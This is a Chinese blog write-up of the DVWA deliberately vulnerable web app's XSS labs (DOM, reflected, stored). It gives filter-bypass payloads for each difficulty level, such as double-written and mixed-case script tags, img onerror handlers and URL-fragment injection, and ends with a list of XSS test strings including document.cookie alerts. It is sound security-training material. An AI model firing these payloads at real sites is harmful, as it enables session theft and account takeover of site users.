当前位置: 首页 > news >正文

DVWA-XSS

DOM

low

这是一个下拉框的形式,但是如果我们不让他等于English呢,换成js代码呢?

<script>alert('xss');</script>

Medium

<script> 标签,但仅使用简单的字符串匹配进行替换(比如移除 "<script")。绕过 <script> 标签限制,使用 HTML 事件属性(如 onerror, onload

?default=English>/option></select><img src='#' onerror='alert(1)'>

High

开发者现在只允许白名单语言(如 English、French),不允许任意值传入

利用 URL 的 fragment 部分(即 # 后的内容),这部分不会被发送到服务器,因此无法被服务器端过滤。

?default=English#<script>alert(1)</script>

Reflected

low

<script>alert("css");</script>

Medium

当我们输入<script>alert("css");</script>,发现script标签不见了,我们可以试试双写。

<sc<script>ript>alert("css");</scrip</script>t>

我们查看一下源码,确实对标签进行了一个过滤。挺抽象的,居然只对这个<script>进行检查。

$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 

那我们可以构造一个:

<sc<script>ript>alert("css");</script>

那其实这样子也有其他方法,比如大小写:

<sCrIPt>alert("x");</sCrIpT>

High

不用想,肯定比上一关过滤的更加严格,那我们除了alert还有什么,有的

<img src=# onerror=alert("xss")>

查看源码:可以看到不让你出现script标签,但是除了这个标签还有很多其他实用的。

 $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); 

Stored

low

Medium

用这个好像都可以直接就过了(苦笑)。

<img src=# onerror=alert("xss")>

查看源码

<?phpif( isset( $_POST[ 'btnSign' ] ) ) {// Get input$message = trim( $_POST[ 'mtxMessage' ] );$name    = trim( $_POST[ 'txtName' ] );// Sanitize message input$message = strip_tags( addslashes( $message ) );$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$message = htmlspecialchars( $message );// Sanitize name input$name = str_replace( '<script>', '', $name );$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));// Update database$query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );//mysql_close();
}?> 

首先trim()函数去除首尾空格,strip_tags()从字符串中去除HTML和PHP标记,其次addslashes()返回在预定义字符前添加反斜杠的字符串。预定义字符包括单引号 (')、双引号 (")、反斜杠 (\) 和 NULL (NUL),ysqli_real_escape_string()转义在 SQL 语句中使用的字符串中的特殊字符,<script>替换了这个标签。

我们看到,大多数是对result进行一个审核,我们还有一种方法就是把重心放在name上,因为对他的过滤比较少。

name=<sc<script>ript>alert("x");</script>
message=123

大小写其实也是很重要的一种思路:

name=<sCrIPT>alert("x");</sCrIPT>
message=123

High

思路: 利用HTML事件处理器来触发JavaScript代码,例如使用 <img src=x onerror=alert('XSS')>。这种方式不需要直接使用 <script> 标签就能执行JavaScript代码。

通过使用htmlspecialchars函数,解决了XSS,所以无法注入。通常有一些方式可以测试网站是否有正确处理特殊字符:><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script>"><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert (vulnerable)</script>%3Cscript%3Ealert('XSS')%3C/script%3E<script>alert('XSS')</script><img src="javascript:alert('XSS')"><img src="http://xxx.com/yyy.png" onerror="alert('XSS')"><div style="height:expression(alert('XSS'),1)"></div>(这个仅于IE7(含)之前有效) 

相关文章:

  • PT5F2307触摸A/D型8-Bit MCU
  • 【Flutter】创建BMI计算器应用并添加依赖和打包
  • Flutter 中 build 方法为何写在 StatefulWidget 的 State 类中
  • 【Vue 3 步骤进度条组件实现与使用教程】
  • RESTful API设计:从原则到Gin实现
  • Rust 学习笔记:泛型
  • 从电商角度设计大模型的 Prompt
  • Baklib知识中台驱动智能服务创新
  • 牛客网NC15869:长方体边长和计算问题解析
  • 力扣热题100, 力扣.167两数之和II 力扣80.删除有序数组中的重复项力扣99.恢复二叉搜索树力扣.110平衡二叉树
  • AtCoder 第406场初级竞赛 A~E题解
  • 如何在element ui中el-select的选择项目中添加自定义图标
  • ABC 353
  • 建立java项目
  • 【电商接口】如何通过小红书订单API实现高效电商数据管理?
  • MQTT报文介绍
  • 怎么把cursor(Cursor/ollama)安装到指定路径
  • Python图像处理全攻略:从基础到前沿技术深度剖析
  • Java 中 LRU 缓存机制详解与实践​
  • Linux操作系统:信号
  • 做网站的挣钱么/seo怎么优化简述
  • 邯郸网站设计招聘网/官方百度app下载安装